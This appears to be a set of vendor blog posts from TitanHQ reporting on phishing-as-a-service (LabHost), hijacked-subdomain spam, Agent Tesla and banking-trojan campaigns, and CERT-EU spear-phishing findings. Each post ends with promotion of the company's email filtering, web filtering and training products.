Take LabHost, for example, a PhaaS platform that recently introduced functionality for targeting financial institutions and banks in North America and Canada. Since this new functionality was included in the first half of 2023, attacks have increased considerably. A monthly subscription is paid, and customers are provided with a turnkey phishing kit, which includes the infrastructure for hosting phishing pages, a content generator for creating phishing emails, and a portal for monitoring the progress of campaigns. Customers can choose to pay $179 per month to target Canadian banks, $249 per month to expand the targets to North America, and $300 a month to also target 70 financial institutions worldwide. Customers are also provided with phishing pages for collecting credentials or a variety of other companies, including music streaming sites, delivery services, and telecommunications companies.

Important to the success of any campaign is the ability to defeat multi-factor authentication. The LabHost phishing kit incorporates LabRat, a phishing tool that allows real-time management of phishing campaigns and allows adversary-in-the-middle attacks where two-factor authentication codes and cookies are obtained in addition to usernames and passwords. That means the additional security processes on the online portals of banks can be circumvented. The platform also allows SMS-based attacks to be conducted.

PhaaS allows unskilled hackers to conduct effective campaigns that they otherwise would not be able to conduct. Further, with the use of AI to craft convincing phishing emails, phishing emails are becoming much harder for humans and security solutions to detect, and even MFA and other security measures can be bypassed.

Defending against attacks is therefore challenging, and there is no single cybersecurity solution that will block all attacks. What is needed is a defense-in-depth approach, with multiple, overlapping layers of protection. Cybersecurity solutions are required to block the phishing emails. SpamTitan is an advanced email security solution with AI and machine learning capabilities for identifying novel phishing threats. SpamTitan blocks known malware through AV controls and unknown malware through sandboxing. The message sandboxing feature uses pattern filtering to identify malware from its behavior, which allows zero-day malware threats to be identified and blocked. Malware sandboxing is vital for email security since so many novel malware threats are now being released. SpamTitan is also capable of identifying even machine-crafted phishing content.

Phishing Statistics Infographic

End user training is also vital, as no email security solution will block all email threats without also blocking an unacceptable number of genuine emails. End users should be trained on how to identify, avoid, and report phishing emails. The SafeTitan security awareness training platform makes security awareness training simple, and the constantly updated content allows businesses to respond to changing phishing tactics and conduct phishing simulations on the workforce to reinforce training and identify knowledge gaps.

Given the number of phishing kits that are capable of bypassing multi-factor authentication, simply enabling MFA on accounts is no longer sufficient to protect against unauthorized access. Phishing-resistant multi-factor authentication is required – FIDO/ WebAuthn authentication or Public key infrastructure (PKI)-based MFA – to block adversary-in-the-middle attacks that can be conducted through PhaaS.

If you want to improve your defenses against phishing and other cybercriminal services, give the TitanHQ team a call to discuss your options.

Massive Spamming Campaign Uses Thousands of Hijacked Subdomains

A massive email spamming campaign has been detected that is generating up to 5 million emails per day that direct recipients of the emails to a variety of scam sites. The emails are sent through hijacked subdomains and domains of trusted companies, which help these emails evade email security solutions and be delivered to inboxes. Companies that have had domains and subdomains hijacked include eBay, CBS, McAfee, MSN, and Symantec.

Email security solutions perform a range of checks on inbound emails, including reputation checks on the senders of emails. If a domain is trusted and has not previously been associated with spamming, these checks – using SPK, DKIM, and DMARC – are likely to be passed, resulting in the emails being delivered to end users. The use of these legitimate domains also makes it harder for end users to determine whether the messages are genuine. Security awareness training programs often teach end users to check the sender of the email and make sure that it matches the company being spoofed. If the domain is eBay, and the email uses eBay branding, end users are likely to think that the communication is genuine. These emails include links to websites that generate fraudulent ad revenue, and often several redirects occur before the user lands on the destination scam or phishing site.

The ‘SubdoMailing’ campaign was identified by researchers at Guardio Labs, with the legitimate domains typically hijacked through SPF record exploitation or CNAME hijacking. The former involves searching for domains that use the ‘include’ configuration option that points to external domains that are no longer registered. Those domains are then registered by the threat actor and the SPF records are changed to authorize the use of their own email servers. When those servers are used to send emails, they appear to have been sent by the targeted brand, such as eBay.

With CNAME hijacking, scans are conducted to identify subdomains of reputable brands with CNAME records that point to external domains that are no longer registered. The threat actor then registers those domains, SPF records are injected, and emails can be sent from their email servers to show that they have been sent by a legitimate company. By hijacking huge numbers of domains and subdomains, the threat actor is able to conduct massive spamming campaigns. The researchers identified more than 13,000 subdomains and more than 8,000 domains that were used in the campaign, with more than 1000 residential lines used and almost 22,000 unique IPs. The researchers developed a tool to allow domain owners to check whether their own domains have been hijacked and take action to stop that abuse. An advanced spam filter is required to block the messages that are set from these hijacked domains and subdomains – one that does not rely on SPF, DKIM, and DMARC for identifying spam emails.

Travel Companies Impersonated in Malware Distribution Campaign

Cybercriminals are constantly devising new email campaigns for distributing malware. These campaigns usually impersonate a trusted entity and advise the email recipient about a pressing issue that requires immediate attention. The emails often have an attached file that must be opened to find out further information about the issue detailed in the email.

One recently detected campaign impersonates travel service providers such as booking.com and advises the recipient about a problem with a recent booking. One of the intercepted emails explains that an error has occurred with a booking that has resulted in a double charge to the user’s credit card which requires immediate attention. The email has a PDF attachment which needs to be opened for further information. PDF files are increasingly being used in email campaigns for distributing malware. The PDF files often contain a script that generates an error message when the file is opened that tells the user that the content of the file cannot be displayed, and they are provided with an option to download the file.

In this campaign, the PDF file contains a script that generates a fake popup message. If clicked, a connection is made to a malicious URL and a download of an obfuscated JavaScript file is initiated. The script downloads the next stage PowerShell payload, and on execution, drops a malicious DLL file on the device. The DLL file searches for certain critical system processes and attempts to forcibly stop them, makes changes to the registry that affect the Windows Antimalware Scan Interface (AMSI) and ensures that the malware is executed without being detected by security solutions. An analysis of the DLL file by researchers at Forcepoint shows the file is from the Agent Tesla malware family. Agent Tesla is a remote access trojan (RAT) that first appeared in 2014 and grew in popularity during the COVID-19 pandemic. Agent Tesla is provided under the malware-as-a-service model and is popular with initial access brokers, who specialize in gaining access to devices and accounts and then sell that access to other cybercriminals such as ransomware gangs.

Agent Tesla allows commands to be run on compromised systems and is capable of stealing sensitive information, such as login credentials stored in browsers. The malware can also take screenshots, log keystrokes, and perform other malicious actions. The malware uses multiple layers of obfuscation to ensure it is not detected by antivirus solutions. The malware is commonly used to gain initial access to business networks, primarily through phishing campaigns. In this campaign, by impersonating a popular travel service company there is a reasonable chance that the user may have used the service in the past or have a current booking and will therefore open the email. However, since the emails reference a charge to a credit card, that may be sufficient to get the user to open the attachment.

To protect against this and other malware distribution campaigns, businesses should ensure that they protect all endpoints with email security and antivirus solutions that are capable of behavioral analysis of files, as Agent Tesla and many other popular malware variants use obfuscation to bypass signature-based security solutions. Web filtering solutions provide added protection as they block connections to the malicious URLs that host malware and they can be configured to block downloads of executable files from the Internet. It is also important to provide security awareness training to the workforce to raise awareness of cyber threats and conduct phishing simulations to test the effectiveness of training.

TitanHQ offers a range of cybersecurity solutions for businesses and managed service providers to help them defend against cyber threats delivered via email and the Internet, including spam filtering with email sandboxing, web filtering, and security awareness training. Give the team a call today to find out more about improving your defenses against phishing and malware. All TitanHQ solutions are available on a free trial to allow you to test the products and see for yourself the difference they make.

Massive Phishing Campaign Leverages Google Cloud Run to Deliver Banking Trojans

A massive malware distribution campaign has been detected that uses phishing emails for initial contact with businesses and Google Cloud Run for hosting the malware. A variety of banking trojans are being distributed including Astaroth, Mekotio, and Ousaban. The campaign primarily targets countries in Latin America, and as such the majority of the phishing emails are in Spanish, but Italian versions have also been detected and there are indications that the campaign is spreading to other regions including Europe and North America.

The phishing emails used in this campaign appear to be legitimate invoices, statements, and communications from government and tax agencies and include a link that the recipient must click to view the attached invoice, statement, or demand. The link directs the user to services on Google Cloud Run, which is a popular service for hosting frontend and backend services and deploying websites and applications without having to manage infrastructure. Google Cloud Run has been used for hosting malware throughout 2023 but there was a massive spike in activity that started in September 2023 and has continued through January and February.

Over the past few months, Google’s service has been proving popular with cybercriminals for hosting malware as it is both cost-effective and is generally not blocked by security solutions. If a user clicks the email link, an MSI file is downloaded onto their device. MSI files are executable files, which in this case include embedded JavaScript that downloads additional files and delivers one or more banking trojans.

The banking trojans achieve persistence through LNK files in the startup folder that execute a PowerShell command on boot that runs the infection script. The banking trojans are capable of keylogging, clipboard monitoring, screenshots, credential theft, and traffic manipulation to direct users to cloned websites of financial institutions to capture banking credentials. The Astaroth banking trojan alone targets more than 300 financial institutions as well as cryptocurrency exchanges.

To protect against this and other malware distribution campaigns, businesses need to adopt a defense-in-depth approach and should implement multiple layers of protection. The first line of defense is a spam filter or email security solution to block the initial phishing emails. SpamTitan Plus is a leading-edge anti-spam service that provides maximum protection against malicious emails. The solution has better coverage, faster phishing link detections, and the lowest false positive rate of any product, which makes it the best spam filter for businesses and an ideal MSP spam filtering solution In addition to including all leading phishing feeds to ensure the fastest possible detection of new phishing threats, SpamTitan Plus uses predictive analysis to identify suspicious URLs that have not yet been detected as malicious.

A web filter, such as WebTitan, can be used to control access to the Internet. For example, blocks can be placed on websites and certain categories of websites down to the user level, the solution prevents access to all known malicious URLs, and can be configured to block file downloads from the Internet, such as MSI files and other executable files that are often used for malware delivery.

Cybercriminals often host malware on legitimate hosting platforms which are usually trusted by security solutions, which means malicious emails may be delivered to end users. It is therefore important to provide security awareness training for the workforce. Security awareness training raises awareness of the threats that employees are likely to encounter and teaches them security best practices to help them identify, avoid, and report cyber threats. Combined with phishing simulations, it is possible to greatly reduce susceptibility to phishing and malspam emails. Data from companies that use the SafeTitan security awareness training platform and phishing simulator shows susceptibility to phishing threats can be reduced by up to 80%.

If you are looking to improve your defenses against phishing and malware, give the TitanHQ team a call to find out more about these products and to help get you set up for a free trial to put these solutions to the test in your own environment.

Spear Phishing is the Most Common Method of Initial Access in the EU

A recent report from the Computer Emergency Response Team (CERT-EU) has provided insights into how EU organizations are being targeted by nation-state-sponsored actors and cybercriminal groups. The majority of nation-state activity has been linked to hacking groups in the Russian Federation and the People’s Republic of China, and while it is not always possible to determine the motives behind cyberattacks and intrusions, the majority of nation-state hacking activity is believed to be conducted to achieve cyberespionage objectives. The aim of these campaigns is to gain access to accounts/emails or servers where sensitive data is stored. Around 73% of all attacks within the EU are believed to be conducted for espionage purposes, with 16% of attacks conducted by hacktivists. Some of the hacktivism incidents are thought to be a front for nation-state activity.

In contrast to the United States, cybercriminal activity accounts for a low percentage of all malicious activity, with only 7% of intrusions attributed to cybercrime. CERT-EU reports that only a very limited number of cybercrime actors are conducting attacks within the EU, and the majority of that activity comes from ransomware groups. These groups gain access to internal networks, steal sensitive data, and encrypt files then demand payment to prevent the publication of the stolen data and for the keys to decrypt data.

In 2023, CERT-EU identified 55 ransomware operations that were active within the EU, and 906 victims were identified from data leak sites and open sources. It should be noted that not all ransomware attacks are reported and many companies quietly pay the ransom, so the true total could be substantially higher. Many of these attacks appeared to be opportunistic in nature rather than targeted. While there are many different ransomware groups, the most active in the EU were LockBit, Play, and BlackBasta, although in Q4, 2023 there was a large increase in attacks by the 8Base group, with NoEscape also highly active in the second half of the year. Ransomware groups attacked a wide range of sectors, with manufacturing the worst affected with 24% of attacks, followed by legal/professional services (14%), and construction/engineering (12%).

A variety of methods were used to gain access to targeted networks. 104 software products were targeted with these attacks often exploiting vulnerabilities in internet-facing products, involving trojanized software, fake software, and abuse of public repositories used for programming languages. Some of the most significant attacks of the year involved networking products, such Fortinet, Cisco, and Citrix products, as well as password managers such as 1Password or LastPass, content management and collaboration tools such as WordPress and Altassian Confluence, and cloud services. While many attacks used these methods for initial access, by far the most common method was spear phishing for both cybercriminal and nation-state threat actors.

Spear phishing attacks include malicious links to websites where credentials are harvested or malicious attachments. There was a significant increase in spear phishing attacks that used lures related to EU affairs, with it common to include decoy PDF files that were originally internal or publicly available documents related to EU policies, for example, documents relating to the Swedish Presidency of the Council of the European Union,  EU – Community of Latin American and Caribbean States (CELAC) Summit, and the Working Party of Foreign Relations Counsellors (RELEX). These campaigns were directed at individuals and organizations involved in EU policies, and the emails often impersonated staff members of union entities or the public administration of EU countries to add credibility. Public administration entities were the most targeted, followed by entities in diplomacy, defense, transport, finance, health, energy, and technologies. While spear phishing is usually performed via email, CERT-EU notes some diversification of communications, with attacks also conducted via social media networks, instant messaging services, and SMS messages.

Entities in the EU should implement layered defenses against the most common initial access vectors. An advanced email security solution should be implemented that is capable of signature and behavioral analysis of emailed files, with extensive threat intelligence feeds, and AI/machine learning capabilities. SpamTitan anti-spam software has all of these features and more and will protect your business from all types of email-based attacks. SpamTitan is offered as a cloud-based anti-spam service or can be provided as an anti-spam gateway for on-premises environments. A web filter such as WebTitan will protect against the internet-based component of cyberattacks by blocking access to malicious sites, and security awareness training and phishing simulations should be conducted on the workforce using a solution such as SafeTitan. To protect against unauthorized account access, multi-factor authentication should be implemented and software should be kept up to date with the latest updates and patches applied promptly.